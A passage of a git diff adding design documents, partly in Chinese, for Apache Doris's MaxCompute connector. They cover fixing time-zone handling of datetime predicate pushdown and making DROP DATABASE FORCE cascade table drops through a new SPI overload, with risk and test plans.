DATETIME 按 UTC 比较)必须以 session TZ 为转换基准。用 project-region TZ 会以错误基准解释用户字面量 → 偏移丢行。 + +**连接器可拿 session TZ(关键调研结论)**:`ConnectorSession` 有一等方法 `getTimeZone()`(`ConnectorSession.java:36-37`,「session time zone identifier, e.g. 'Asia/Shanghai'」)。其实现 `ConnectorSessionImpl.getTimeZone()` :75-77 返回构造期注入值;`ConnectorSessionBuilder.from(ctx):58` 注入 `ctx.getSessionVariable().getTimeZone()` —— **与 legacy `DateUtils.getTimeZone()` 同源**。scan 路径的 session 经 `PluginDrivenExternalCatalog.buildConnectorSession():465-472` 走 `from(ctx)`(query 线程有 ctx),并由 `PluginDrivenScanNode.create():143` 在构造期捕获、`getSplits():426-427` 传入 `planScan`。故 `ZoneId.of(session.getTimeZone())` ≡ legacy(且因 session 在 plan 期捕获,比 legacy 运行时读 `ConnectContext.get()` 对异步 batch-split 路径**更稳**)。 + +**为何 CI 没抓**:连接器侧 `MaxComputePredicateConverter` **零 UT 覆盖**(仅 `MaxComputeScanPlanProviderTest` 测 partition/limit helper,不构造 converter);live e2e 仅 `test_max_compute_partition_prune.groovy`(分区裁剪,无 datetime 谓词、无跨 TZ)。 + +## Blast radius + +- `MaxComputePredicateConverter` 为 MaxCompute 专有类,仅被 `MaxComputeScanPlanProvider.convertFilter` 构造 → 修改只影响 MC 读谓词下推。 +- 仅 DATETIME/TIMESTAMP/TIMESTAMP_NTZ 三分支改动;BOOLEAN/数值/STRING/CHAR/VARCHAR/**DATE** 分支不动(DATE 用 `LocalDate.toString()`=`"yyyy-MM-dd"` 恰与 legacy `getStringValue(DateV2)` 一致,本就正确,不在本 fix 范围)。 +- delta-2 改 source TZ:当 session TZ == project-region TZ(同区部署、最常见)时行为不变;仅在两者不一致时纠偏(恢复 legacy parity)。 +- `dateTimePushDown=false` 时三分支 fall-through 抛 `UnsupportedOperationException` → `convert()` catch → `NO_PREDICATE`(不下推,BE 过滤)——与现状一致,不动。 + +## Design + +**Shape A(连接器局部,无 SPI 变更)** —— 直接对 `LocalDateTime` 值格式化 + 用 session TZ 转换。 + +### delta-1:`MaxComputePredicateConverter` 直接 format LocalDateTime + +把 DATETIME/TIMESTAMP/TIMESTAMP_NTZ 三分支从「`String.valueOf(value)` → 喂 formatter」改为「取 `LocalDateTime value` → 直接 `format(formatter)`(+ 可选 TZ 转换)」。新私有助手取代字符串版 `convertDateTimezone`: + +```java +// DATETIME (scale 3, 转 TZ): +return " \"" + formatDateTimeLiteral(literal.getValue(), DATETIME_3_FORMATTER, true) + "\" "; +// TIMESTAMP (scale 6, 转 TZ): +return " \"" + formatDateTimeLiteral(literal.getValue(), DATETIME_6_FORMATTER, true) + "\" "; +// TIMESTAMP_NTZ (scale 6, 不转 TZ —— 镜像 legacy :585-592 无 convertDateTimezone): +return " \"" + formatDateTimeLiteral(literal.getValue(), DATETIME_6_FORMATTER, false) + "\" "; + +private String formatDateTimeLiteral(Object value, DateTimeFormatter formatter, boolean convertTimeZone) { + if (!(value instanceof LocalDateTime)) { // 防御:非 LocalDateTime → 抛 → convert() catch → NO_PREDICATE(镜像 legacy 对非 DateLiteral 抛) + throw new UnsupportedOperationException("Expected LocalDateTime for datetime predicate, got: " + + (value == null ? "null" : value.getClass().getSimpleName())); + } + LocalDateTime ldt = (LocalDateTime) value; + if (convertTimeZone && !sourceTimeZone.equals(UTC)) { // 镜像 legacy convertDateTimezone 短路:source==UTC 不转 + ldt = ldt.atZone(sourceTimeZone).withZoneSameInstant(UTC).toLocalDateTime(); + } + return ldt.format(formatter); +} +``` + +- 为何正确:value 即 fe-core 存入的 `LocalDateTime`(已是 bound 谓词 scale),`format(DATETIME_3/6_FORMATTER)` 逐字符等于 legacy `getStringValue(DatetimeV2Type(3|6))`(见 Root Cause 字节级对齐)。彻底根除 `toString()`→reparse 链:不再抛、不再推 malformed。 +- TZ 转换语义 = legacy `convertDateTimezone`(source TZ → UTC,source==UTC 短路)。NTZ 不转,对齐 legacy。 +- 删除字符串版 `convertDateTimezone:254-263`(被新助手取代)。 + +### delta-2:source TZ 改用 session TZ(**TZ 字符串惰性解析** —— impl-review F1 折入) + +`MaxComputeScanPlanProvider`:planScan 已持 `session`,把 session TZ **字符串**下传 `convertFilter`,由 converter 在格式化 datetime 字面量时(`convert()` 的 catch 内)惰性 `ZoneId.of`: + +```java +// planScan 内: +Predicate filterPredicate = convertFilter(filter, odpsTable, session); +... +private Predicate convertFilter(..., ConnectorSession session) { + ... + // 传 raw id 字符串(非预解析 ZoneId);converter 惰性解析。≡ legacy DateUtils.getTimeZone() 来源。 + MaxComputePredicateConverter converter = new MaxComputePredicateConverter( + columnTypeMap, dateTimePushDown, session.getTimeZone()); + return converter.convert(filter.get()); +} +``` + +**⚠️ impl-review F1(real regression,已修)**:初版用 `ZoneId sourceZone = ZoneId.of(session.getTimeZone())` 在 `convertFilter` **eager 解析**。但 Doris `SET time_zone='CST'`(华区常见、本 Alibaba 连接器尤甚)被 `TimeUtils.checkTimeZoneValidAndStandardize:334` **逐字存储**(不标准化),而 `java.time.ZoneId.of("CST")` 抛 `ZoneRulesException`(PST/EST/MST 同;UTC/GMT/+08:00/Asia\* OK——已实测)。eager 解析 → 抛出 `planScan/getSplits`(**无 enclosing catch**)→ **整查询失败**,且对**任何** WHERE(含非 datetime 如 `id=5`)都炸——比 legacy(per-conjunct catch 降级、且仅 datetime 才解析 TZ)**更糟**,亦比翻闸前(`resolveProjectTimeZone` 永不抛)回归。 +**修法**:构造签名改 `(Map, boolean, String sourceTimeZoneId)`;`ZoneId.of(sourceTimeZoneId)` 移入 `formatDateTimeLiteral`(仅 `convertTimeZone=true`=DATETIME/TIMESTAMP 分支、在 `convert()` 的 try 内)。效果(**legacy parity**): +- 非 datetime 谓词 + CST → 不解析 TZ → 正常下推 ✅ +- DATETIME/TIMESTAMP + CST → `ZoneId.of` 抛 → `convert()` catch → 该谓词 `NO_PREDICATE` 降级(BE 兜底过滤,结果仍正确)✅ +- TIMESTAMP_NTZ + CST → 不转 TZ → 不解析 → 正常下推 ✅ +**不纳入「CST→+08:00 正确解析」**(需 fe-core `TimeUtils.timeZoneAliasMap`,连接器 import-gate 禁;legacy 亦降级 ⇒ parity=降级,正确改进越界)。 + +### 死代码处置(决策点) + +delta-2 后 `MaxComputeScanPlanProvider.resolveProjectTimeZone()`(私有 wrapper :293-295)**唯一调用点消失** → 删之(同文件、确定死、留之即死代码)。其委托的 `MCConnectorEndpoint.resolveProjectTimeZone(String)` :111-125 + 仅供它用的 `REGION_ZONE_MAP` :34-60(共 ~60 行)随之变为**零调用方**(grep 全 repo 0 test 引用)。 + +- **本设计取:删私有 wrapper(provider 内,确定死);`MCConnectorEndpoint.resolveProjectTimeZone`+`REGION_ZONE_MAP` 暂留**,登记为 **Batch-D 死代码清理项**。理由(Rule 3 surgical):correctness fix 不跨文件做大段删除,跨文件死代码归 Batch-D 清理阶段统一处理;该 public 方法语义(「项目区域 TZ」)非内在错误,仅「用错于谓词转换」,留之不破坏编译、不误导(已在 tracker 标注)。 +- 备选(设计验证可推翻):本 fix 一并删 `MCConnectorEndpoint.resolveProjectTimeZone`+`REGION_ZONE_MAP`,彻底无死代码。若设计验证/用户倾向「不留 bug 残骸」则采此。 + +## Implementation Plan + +1. `MaxComputePredicateConverter`:三 datetime 分支改直接 format `LocalDateTime`;新增私有 `formatDateTimeLiteral`;删字符串版 `convertDateTimezone`;保留 `DATETIME_3/6_FORMATTER` 常量与构造签名。`UTC` 抽常量 `private static final ZoneId UTC = ZoneId.of("UTC")`(避免重复 `ZoneId.of`)。 +2. `MaxComputeScanPlanProvider`:`convertFilter` 加 `ConnectorSession session` 形参、用 `ZoneId.of(session.getTimeZone())`;planScan 调用点传 `session`;删私有 `resolveProjectTimeZone()`。 +3. **新增 UT** `MaxComputePredicateConverterTest`(连接器模块,无 fe-core/Mockito,纯构造 ConnectorExpression)——见 Test Plan。 +4. tracker 登记 `MCConnectorEndpoint.resolveProjectTimeZone`+`REGION_ZONE_MAP` 为 Batch-D 死代码清理项。 + +## Risk Analysis + +| Risk | Mitigation | +|---|---| +| `LocalDateTime.format` 与 legacy `getStringValue` 精度/格式分歧 | 已字节级核对(截断 + 定长 + 空格 + nanos 末3位恒0);UT 钉确切串 `"2023-02-02 00:00:00.000"` / `.000000`。 | +| value 非 LocalDateTime(异常输入) | 防御 instanceof → 抛 → `convert()` catch → `NO_PREDICATE`(镜像 legacy 对非 DateLiteral 抛 AnalysisException 丢谓词)。UT 覆盖。 | +| session TZ 为 null / ctx 缺失 | scan 在 query 线程必有 ctx → `from(ctx)` 注入真 TZ;`ConnectorSessionImpl` 默认 "UTC"(仅 no-ctx 边角,legacy 此时 `systemDefault()`,scan 路径不可达)。设计中已说明、UT 注释标注。 | +| 改 source TZ 误伤同区部署 | session==project-region 时零变化;仅跨 TZ 纠偏,恢复 legacy parity。 | +| 删 wrapper 误删在用代码 | grep 确认 `resolveProjectTimeZone()` 唯一调用点即 line 287;删后编译验证。 | + +## Test Plan + +### Unit Tests(新增 `MaxComputePredicateConverterTest`,连接器模块) + +钉 **WHY**(Rule 9):谓词必须以正确格式 + 正确 TZ 基准下推,否则静默丢行 / 性能回归。 + +1. **delta-1 format(核心)**:DATETIME 列 `dt == LocalDateTime(2023,2,2,0,0,0)`,`dateTimePushDown=true`,sourceTZ=UTC → `convert(cmp).toString()` 含 `dt == "2023-02-02 00:00:00.000"`(空格分隔、3 位 fraction)。带 fraction 例(micro=123456 → `.123`)。 +2. **TIMESTAMP**:→ `.000000` / `.123456`(6 位)。**TIMESTAMP_NTZ**:6 位且**不**做 TZ 转换(sourceTZ≠UTC 时仍按本地值 format)。 +3. **delta-1 非降级(perf 回归 repro)**:sourceTZ=非 UTC(Asia/Shanghai)+ DATETIME 谓词 → 结果**非** `Predicate.NO_PREDICATE`(修前此处抛→NO_PREDICATE)。`assertNotSame(Predicate.NO_PREDICATE, result)` + 串非空。 +4. **delta-2 TZ 转换**:sourceTZ=Asia/Shanghai(+08:00)、DATETIME `2023-02-02 08:00:00` → UTC `2023-02-02 00:00:00.000`。钉转换确切串(证基准为传入 sourceZone)。 +5. **混合树不降级**:`AND(part_eq, datetime_cmp)` 整树正常转换(修前 datetime leaf 抛 → 整树 NO_PREDICATE)。 +6. **mutation**(守门):还原任一 delta(format 改回 `String.valueOf` / TZ 改回固定 UTC 常量)→ 对应断言变红。 + +### E2E Tests(CI 跳,真实 ODPS = 真值闸 DV-022) + +- DATETIME/TIMESTAMP 列谓词在 **UTC 与非-UTC(如 Asia/Shanghai)session time_zone** 下均返回**正确行集**(修前:非 UTC 全表扫不下推 / 跨 TZ 丢行)。 +- EXPLAIN/profile 证谓词确下推 ODPS(非 BE-only 兜底)。 +- 需 ODPS 含 datetime 列表 + 跨 region/TZ 验证 → 归 DV-022,需用户 live 跑。 + +## 守门结果(DONE) + +编译 BUILD SUCCESS;UT `MaxComputePredicateConverterTest` 13/13 + 连接器模块 55 run/0 fail/1 skip(live 测跳);既有 `MaxComputeScanPlanProviderTest` 26/26 不受影响;checkstyle 0;import-gate exit 0。 +mutation(in-place,因构造 API 改、revert-to-HEAD 不可编译):M1 `format(formatter)`→`toString()` → 8/13 红(format 断言);M2 `ZoneId.of(sourceTimeZoneId)`→`UTC` → 3/13 红(TZ 转换 + CST 降级断言);还原 → 13/13 绿。 + +## impl-review(单 Agent 对抗,Ultracode off) + +CHANGES-REQUIRED → 折入: +- **F1(real regression,已修)**:见上 delta-2「⚠️ impl-review F1」。已实测 `ZoneId.of("CST/PST/EST/MST")` 抛、`UTC/GMT/+08:00/Asia\*/Z/PRC` OK;`checkTimeZoneValidAndStandardize` 逐字存 CST(line 334);legacy `convertPredicate:307-314` per-conjunct catch 降级。 +- **F2(test gap,已补)**:F1 修后解析移入 converter → 由 `testUnparseableSessionZoneDegradesDatetimePredicate`(CST+datetime→NO_PREDICATE)+ `testUnparseableSessionZoneStillPushesNonDatetimePredicate`(CST+`id=5`→下推)+ `testTimestampNtzPushesUnderUnparseableZone` 覆盖。 +- **F3(test breadth,部分补)**:加 `testDatetimeInListFormatsEachValue`(IN-list datetime 走 `convertIn`→`formatLiteralValue` 路径)。非-EQ 算子 / zero-offset-非-UTC(`+00:00`)经核**非缺陷**(复用同 format 路径),未补、接受。 +- **F4(nit,接受不改)**:`formatLiteralValue:201` 仍对所有字面量算 `rawValue=String.valueOf(value)`,datetime 分支不再用之 → 对 datetime 字面量多跑一次 `LocalDateTime.toString()` 丢弃。**pre-existing**(翻闸前 datetime 分支即先算 rawValue),非本 fix 引入;rawValue 仍被 BOOLEAN/数值/STRING/CHAR/VARCHAR/DATE/null-type 分支用。Rule 2/3:纯 cosmetic/微 perf,不改。 +- **确认 SAFE**(reviewer 证据):format 字节级 parity(全 10^6 microsecond × scale 3/6,0 mismatch);TZ source parity(同 `from(ctx)` 源、null-ctx 分歧 scan 路不可达、plan 期捕获比 legacy 运行时读更稳);instanceof guard = legacy(非 DateLiteral 亦丢谓词);NTZ scale-6 不转 TZ = legacy;死代码零调用方(grep 证)。 +- **死代码登记**:`MCConnectorEndpoint.resolveProjectTimeZone` + `REGION_ZONE_MAP`(~60 行)翻闸后零调用方 → 登记 Batch-D 死代码清理(本 fix 仅删 provider 内死的私有 wrapper)。 + +## 决策类型 + +明确修复(用户定 Fix,Tier 1)。连接器局部、无 SPI 变更、与 legacy `MaxComputeScanNode` 谓词转换达成 parity。 + +**用户定夺(2026-06-08)**: +- **design-verify = Skip → 直接 implement**(设计已深度核码:format 字节级对齐 + TZ source 经 `from(ctx)` 确认)。仍走守门(编译+UT+checkstyle+import-gate+mutation)+ 末端 impl-review。 +- **死代码 = Keep + defer Batch-D**:本 fix 仅删 provider 内死的私有 wrapper `resolveProjectTimeZone()`;`MCConnectorEndpoint.resolveProjectTimeZone`+`REGION_ZONE_MAP` 暂留、登记 Batch-D 死代码清理项。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-DROP-DB-FORCE-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-DROP-DB-FORCE-design.md new file mode 100644 index 00000000000000..c0443ddc1afeb4 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-DROP-DB-FORCE-design.md @@ -0,0 +1,370 @@ +# Problem + +`DROP DATABASE FORCE` on a `max_compute` catalog no longer cascades the table +drops after the SPI cutover. The legacy `MaxComputeMetadataOps.dropDbImpl` enumerated +the remote tables and dropped each one before deleting the schema when `force==true`; +the plugin-driven path silently discards the `force` flag. On a non-empty schema this +degrades `DROP DB FORCE` to a non-FORCE drop — ODPS `schemas().delete()` does not +auto-cascade (the very existence of the legacy enumerate-loop proves it), so the drop +either fails outright or leaves residue. Silently dropping the user's `force` intent +also violates Rule 12 (fail loud). + +Issue id: **P2-5 FIX-DROP-DB-FORCE** (clean-room re-review DG-3 / findings F22, F27). + +# Root Cause + +Confirmed against the code on branch `catalog-spi-05`: + +**Cutover path (force dropped):** +- `fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:337-355` + `dropDb(String dbName, boolean ifExists, boolean force)` accepts `force` but never + forwards it. At **:348** it calls the 3-arg SPI: + `connector.getMetadata(session).dropDatabase(session, dbName, ifExists)`. The Javadoc + at **:332-335** explicitly self-documents the gap: *"The SPI carries no `force`; + cascade semantics, if any, are left to the connector, so `force` is intentionally not + forwarded."* — but the connector does NOT cascade either (below). +- `fe/fe-connector/fe-connector-api/.../ConnectorSchemaOps.java:54-59` + the SPI only declares `default void dropDatabase(session, dbName, ifExists)` — there + is no `force`/cascade parameter, so the flag cannot even reach the connector. +- `fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java:415-420` + `dropDatabase(session, dbName, ifExists)` is just + `structureHelper.dropDb(odps, dbName, ifExists)` — no table enumeration, no cleanup. + `ProjectSchemaTableHelper.dropDb` (`McStructureHelper.java:195`) calls + `schemas().delete()`; `ProjectTableHelper.dropDb` (`:323-328`) throws "not supported" + (namespace-schema=false has no schemas to drop). + +**Effect:** with `force=true` on a non-empty schema, the cutover issues a bare +`schemas().delete()` against a schema that still has tables → ODPS rejects / residue. + +# Parity Reference + +Legacy code being mirrored — +`fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:132-157`: + +```java +public void dropDbImpl(String dbName, boolean ifExists, boolean force) throws DdlException { + ExternalDatabase dorisDb = dorisCatalog.getDbNullable(dbName); + if (dorisDb == null) { + if (ifExists) { LOG.info(...); return; } + else { ErrorReport.reportDdlException(ERR_DB_DROP_EXISTS, dbName); } + } + if (force) { // <-- cascade gate + List remoteTableNames = listTableNames(dorisDb.getRemoteName()); + for (String remoteTableName : remoteTableNames) { + ExternalTable tbl = null; + try { + tbl = (ExternalTable) dorisDb.getTableOrDdlException(remoteTableName); + } catch (DdlException e) { LOG.warn(...); continue; } // <-- skip-on-fail + dropTableImpl(tbl, true); // drop each table first + } + } + dorisCatalog.getMcStructureHelper().dropDb(odps, dbName, ifExists); // THEN delete schema +} +``` + +Two parity facts that bound the fix: +1. **Enumerate-then-drop ordering**: every table is dropped (with `ifExists=true`) + BEFORE `dropDb` deletes the schema. This is the behavior we must restore. +2. **FE-cache effect of the legacy force path is db-level ONLY**: legacy emits NO + per-table editlog and NO per-table `afterDropTable` for the cascaded tables — the + only FE bookkeeping is the single db-level `afterDropDb → unregisterDatabase` + (`MaxComputeMetadataOps.java:160-162`) plus the single `logDropDb` + (`ExternalCatalog.dropDb`). Therefore pushing the cascade entirely into the + connector (no per-table FE editlog) is exactly faithful to legacy — the plugin + path already emits the one `logDropDb` + `unregisterDatabase` + (`PluginDrivenExternalCatalog.java:352-353`), which is the complete legacy FE + bookkeeping. + +# Design + +**Chosen direction (honoring the user's decision): extend the SPI `dropDatabase` with +`force` and push the cascade into the connector — NOT an FE-side cascade.** + +Why this is correct and minimal: +- The cascade is inherently a remote-storage operation (enumerate ODPS tables, delete + each via the ODPS `tables().delete()` already used by `MaxComputeConnectorMetadata.dropTable`). + Pushing it into the connector keeps fe-core generic and confines MaxCompute-specific + semantics to the MaxCompute connector — matching how the cutover already routes + CREATE/DROP TABLE/DB through the SPI. +- An FE-side cascade would force fe-core to enumerate + per-table editlog, which is + EXTRA bookkeeping legacy never did (legacy cascade is editlog-silent per table) — so + the connector-side approach is *also* the closer parity match, not just the simpler one. +- **Additive-default SPI overload** (the established pattern used by P0-1/2/3 and + P1-4's 6-arg `planScan`): add a new 4-arg `dropDatabase(session, dbName, ifExists, + boolean force)` with a `default` body that delegates to the existing 3-arg form. The + other six connectors (es/jdbc/hive/hudi/iceberg/paimon/trino) never override + `ConnectorSchemaOps.dropDatabase` (verified: only MaxCompute does) and never call the + SPI form (they go through their own `metadataOps`), so they are ZERO-break: the + default 4-arg simply forwards to their inherited (or absent) 3-arg behavior. +- Only `MaxComputeConnectorMetadata` overrides the 4-arg to cascade. The cascade is + gated by `if (force)`; non-force preserves today's behavior verbatim. + +# Implementation Plan + +Ordered, file-by-file. SPI change first (api module), then connector, then fe-core +caller, then tests. + +### 1. SPI: add additive 4-arg overload +`fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorSchemaOps.java` + +After the existing 3-arg `dropDatabase` (ends at :59), add: + +```java +/** + * Drops the specified database, cascading to its tables when {@code force} is true. + * Default delegates to the non-cascading 3-arg form, so connectors that do not + * support cascade keep their current behavior with zero change. + */ +default void dropDatabase(ConnectorSession session, + String dbName, boolean ifExists, boolean force) { + dropDatabase(session, dbName, ifExists); +} +``` + +Keep the existing 3-arg `dropDatabase` unchanged (it is the delegation target and is +still used by the default). + +### 2. Connector: override the 4-arg to cascade +`fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:415-420` + +Decision on the existing 3-arg override: **fold the 3-arg into the 4-arg** to avoid two +methods that both touch `dropDb`. Replace the current 3-arg `dropDatabase` override with +the 4-arg override; the inherited `default` 3-arg will delegate into it. Concretely, +change the existing override signature from +`dropDatabase(ConnectorSession session, String dbName, boolean ifExists)` to +`dropDatabase(ConnectorSession session, String dbName, boolean ifExists, boolean force)` +and add the cascade: + +```java +@Override +public void dropDatabase(ConnectorSession session, String dbName, + boolean ifExists, boolean force) { + if (force) { + // ODPS schemas().delete() does NOT auto-cascade; enumerate and drop each + // table first (mirrors legacy MaxComputeMetadataOps.dropDbImpl force branch). + for (String tableName : structureHelper.listTableNames(odps, dbName)) { + try { + structureHelper.dropTable(odps, dbName, tableName, true); + } catch (OdpsException e) { + throw new DorisConnectorException("Failed to drop MaxCompute table '" + + tableName + "' during force-drop of database '" + dbName + + "': " + e.getMessage(), e); + } + } + } + structureHelper.dropDb(odps, dbName, ifExists); + LOG.info("dropped MaxCompute database {} (force={})", dbName, force); +} +``` + +Helper signatures confirmed present and already used in this class: +- `structureHelper.listTableNames(odps, dbName)` — used at `MaxComputeConnectorMetadata.java:102`. +- `structureHelper.dropTable(odps, dbName, tableName, true)` — used at `:398` + (single-table `dropTable`); declared `throws OdpsException` + (`McStructureHelper.java:73-74`), hence the try/catch wrapping into + `DorisConnectorException` exactly as the existing single-table `dropTable` override + does at `:399-401`. +- `structureHelper.dropDb(odps, dbName, ifExists)` — the existing terminal call (`:418`). + +Note on legacy skip-on-fail (`continue`): legacy logs+continues if it can't *resolve* +a Doris table wrapper, but its actual remote drop (`dropTableImpl`) is NOT swallowed. +Here there is no FE table-wrapper resolution step (we enumerate remote names directly), +so the only failure point is the remote `dropTable`, which we surface as +`DorisConnectorException` (fail loud, Rule 12) rather than silently continuing — this is +stricter than legacy only for the genuinely-failing-remote-drop case, which is the +correct fail-loud behavior. No imports change (`OdpsException`, `DorisConnectorException` +already imported, confirmed at `:25` and `:37`). + +### 3. fe-core caller: forward `force` +`fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:348` + +Change: +```java +connector.getMetadata(session).dropDatabase(session, dbName, ifExists); +``` +to: +```java +connector.getMetadata(session).dropDatabase(session, dbName, ifExists, force); +``` + +Also update the now-stale Javadoc at `:329-335` — replace the "force is intentionally +not forwarded" sentence with: "`force` is forwarded to the connector, which performs the +table cascade (mirroring legacy `MaxComputeMetadataOps.dropDbImpl`)." The surrounding +FE bookkeeping (`logDropDb` at :352, `unregisterDatabase` at :353) is unchanged — that +is the complete legacy db-level FE effect. + +### 4. FE routing test: update 3-arg stubs to 4-arg + add force-forwarding tests +`fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java` + +The FE caller will now call the 4-arg SPI, so the existing Mockito verify/doThrow stubs +that reference the 3-arg `dropDatabase` must move to the 4-arg form: +- **:139** `Mockito.verify(metadata).dropDatabase(session, "db1", false)` → + `Mockito.verify(metadata).dropDatabase(session, "db1", false, false)`. +- **:151** `Mockito.verify(metadata, Mockito.never()).dropDatabase(Mockito.any(), Mockito.any(), Mockito.anyBoolean())` + → add a 4th matcher: `..., Mockito.any(), Mockito.anyBoolean(), Mockito.anyBoolean())`. +- **:167** `Mockito.doThrow(...).when(metadata).dropDatabase(Mockito.any(), Mockito.any(), Mockito.anyBoolean())` + → `..., Mockito.any(), Mockito.anyBoolean(), Mockito.anyBoolean())`. + +Add two new tests in the DROP DATABASE section (mock `ConnectorMetadata`, so the default +delegation is irrelevant — we assert the exact 4-arg call): +- `testDropDbForceForwardsForceTrueToConnector` — `dropDb("db1", false, true)` then + `verify(metadata).dropDatabase(session, "db1", false, true)`. +- `testDropDbNonForceForwardsForceFalseToConnector` — `dropDb("db1", false, false)` then + `verify(metadata).dropDatabase(session, "db1", false, false)`. + +### 5. Connector cascade test (NEW) +`fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataDropDbTest.java` + +The maxcompute test module has junit-jupiter but **NO mockito** (confirmed: no mockito +in `fe-connector-maxcompute/pom.xml`, connector parent, or api pom; no test uses +`org.mockito`). So the test uses a **hand-written recording fake `McStructureHelper`** +(implements the interface, records call order) — matching how +`MaxComputeBuildTableDescriptorTest` constructs the metadata offline with `null` odps. +The cascade code never dereferences `odps` (it only passes it to the fake helper), so +`null` odps is safe. See Test Plan for the exact tests. + +# Blast Radius + +**SPI overriders of `ConnectorSchemaOps.dropDatabase`** (grep across `fe/fe-connector/`): +only two files — `ConnectorSchemaOps.java` (declaration) and +`MaxComputeConnectorMetadata.java` (the sole override). The other six connectors +(es/jdbc/hive/hudi/iceberg/paimon/trino) do NOT override it and do NOT call the SPI form +(their DROP DB goes through `metadataOps.dropDb` / +`ExternalCatalog.dropDb:1037` / `PaimonMetadataOps.java:158` / `HiveMetadataOps.java:162`, +none of which touch `ConnectorSchemaOps`). The new 4-arg is a `default` that delegates to +the 3-arg, so: +- es/jdbc/hive/hudi/iceberg/paimon/trino: ZERO source change, ZERO behavior change + (they never reach this method; even if they did, the default preserves 3-arg behavior). +- MaxCompute: only connector whose behavior changes, and only on the `force==true` + branch (non-force is byte-for-byte the prior `dropDb` call). + +**Production callers of the SPI `dropDatabase`**: exactly one — +`PluginDrivenExternalCatalog.java:348` (the FE caller being updated). No other +production call site exists (the many `dropDatabase` hits in the grep are Hive/Glue/Datalake +metastore *clients*, an unrelated method on a different interface). + +**Tests whose assertions must change (signature change forces this):** +- `PluginDrivenExternalCatalogDdlRoutingTest.java:139,151,167` — the three 3-arg + `dropDatabase` stubs/verifies, as itemized in Implementation Plan step 4. These are + compile-or-verify breaks caused directly by the FE caller switching to the 4-arg form; + they are mandatory. + +No SPI method is removed; the 3-arg `dropDatabase` stays (it is the delegation target). +No fe-core public signature changes — `PluginDrivenExternalCatalog.dropDb` already had +`force` in its signature. + +# Risk Analysis + +1. **Cross-module rebuild ordering.** SPI lives in `fe-connector-api`. A signature + *addition* (additive default) does not break binary compat for the existing 3-arg + callers, but the new call site in fe-core and the new override in maxcompute both + reference the 4-arg, so api + maxcompute + fe-core must be rebuilt together + (`-am`). Mitigation: build order in Test Plan. + +2. **dbName local-vs-remote name resolution (pre-existing, out of scope).** Legacy + enumerates via `dorisDb.getRemoteName()` and drops via `dorisTable.getRemoteName()`, + whereas `PluginDrivenExternalCatalog.dropDb` passes the **local** `dbName` straight to + the SPI (it does NOT remote-resolve, unlike the `dropTable`/`createTable` overrides at + :390/:279). The cascade therefore enumerates against whatever name the FE passes. For + a non-name-mapped catalog (the common case) local==remote and behavior is correct. + For a name-mapped catalog this is a latent bug — but it is **identical to and + inherited from the already-shipped non-force 3-arg path** (which also passes local + dbName to `dropDb`). Per Rule 3 (surgical) this fix does NOT widen scope to remote- + resolve dbName; doing so would change the existing non-force path too. Surfaced as an + open question (see below) and flagged for the DG-3/DG-4 DB-DDL triage batch. + +3. **Partial cascade on mid-loop failure.** If table N's remote drop throws, tables + 1..N-1 are already gone and the schema is NOT deleted (we throw before `dropDb`). + This is a fail-loud partial state — but it matches legacy's exposure (legacy's + `dropTableImpl` could equally throw mid-loop) and is the correct behavior vs silently + leaving residue. The DdlException surfaces to the user. + +4. **namespace-schema=false mode.** `ProjectTableHelper.dropDb` throws "not supported" + (`McStructureHelper.java:323-328`). With `force=true` in that mode, we now enumerate + + dropTable first, then hit the same "not supported" on `dropDb`. Net behavior is the + same terminal error as today (CREATE/DROP DB is unsupported without namespace-schema); + the extra table drops before the throw are harmless because that mode realistically + isn't used for DROP DB at all. No regression vs current. + +5. **Live ODPS truth-gate.** UT verifies routing + cascade ordering with fakes/mocks; + it cannot verify ODPS actually rejects non-empty `schemas().delete()`. That remains + the standing live-e2e truth gate (CI-skip). + +# Test Plan + +## Unit Tests + +### A. FE routing — `PluginDrivenExternalCatalogDdlRoutingTest` (fe-core) +File: `fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java` +Class: `PluginDrivenExternalCatalogDdlRoutingTest` + +- **(edit) testDropDbRoutesToConnectorAndUnregisters** (:134) — change the :139 verify + to `dropDatabase(session, "db1", false, false)`. WHY: the FE caller now uses the 4-arg + SPI; this keeps the existing routing+unregister assertion valid against the new signature. +- **(edit) testDropDbIfExistsWhenMissingIsNoop** (:145) — change :151 `never()` matcher + to the 4-arg form. WHY: keeps "missing db + IF EXISTS never touches the connector" + meaningful against the new signature. +- **(edit) testDropDbWrapsConnectorException** (:163) — change :167 `doThrow...when` + matcher to the 4-arg form. WHY: keeps "connector failure → DdlException" wrapping + guarded against the new signature. +- **(new) testDropDbForceForwardsForceTrueToConnector** — `catalog.dbNullableResult = + mock; catalog.dropDb("db1", false, true);` then + `verify(metadata).dropDatabase(session, "db1", false, true)`. WHY (Rule 9): the + regression is that `force` was silently dropped (Rule 12 violation / lost cascade); + this asserts the user's `FORCE` intent actually reaches the connector. +- **(new) testDropDbNonForceForwardsForceFalseToConnector** — same but `force=false` + → `verify(metadata).dropDatabase(session, "db1", false, false)`. WHY: guards that the + fix does NOT spuriously cascade a non-FORCE drop (over-correction would be a new bug). + +MUTATION check: reverting `PluginDrivenExternalCatalog.java:348` to pass a hardcoded +`false` (or back to the 3-arg form) makes **testDropDbForceForwardsForceTrueToConnector** +go red (verify sees `force=false`/no 4-arg call, not `true`). + +### B. Connector cascade — `MaxComputeConnectorMetadataDropDbTest` (fe-connector-maxcompute, NEW) +File: `fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataDropDbTest.java` +Class: `MaxComputeConnectorMetadataDropDbTest` + +Harness: NO mockito in this module → use a hand-written recording fake +`RecordingStructureHelper implements McStructureHelper` that (a) returns a fixed table +list from `listTableNames`, (b) appends `"dropTable:"` to an ordered `List` +log on 